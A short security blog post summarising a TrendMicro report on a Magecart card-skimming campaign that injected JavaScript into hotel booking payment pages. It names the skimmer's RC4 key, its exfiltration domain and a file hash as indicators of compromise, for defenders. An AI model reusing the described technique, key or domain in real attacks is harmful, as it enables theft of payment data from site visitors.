Magecart Skimming Attack Targets Mobile Users of Hotel Chain Booking Websites

TrendMicro analyzed a recent series of attacks by the Magecart threat group during which their credit card skimming malware targeted booking sites of hotel chains. Toward the beginning of September, they discovered JavaScript code injected into the payment pages of two hotel website, each associated with different chains.

The JavaScript code has the purpose of loading a remote script and appears to have been present in the source code of the website since August 9th. Both hotel chains’ websites developed by “Roomleader,” a hotel website development company based in Spain. Their target in the code was the “viewedHotels” module, a script used for saving the viewed hotel information in the visitor’s browser cookies.

The skimmer itself is designed to steal credit card information, names, telephone numbers, and hotel room preferences from the payment forms on the website. This stolen data is encrypted using RC4 with a hardcoded key, “F8C5Pe4Q,” and then subsequently XOR encrypted. The data is exfiltrated using a HTTP POST command to a TLS encrypted website masquerading as a Google tracker URL.

Review of googletrackmanager.com on VirusTotal

Indicators of Compromise

  • googletrackmanager.com
  • ac58602d149305bd2331d555c15e6292bd5d09c34ade9e5eebb81e9ef1e7b312

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: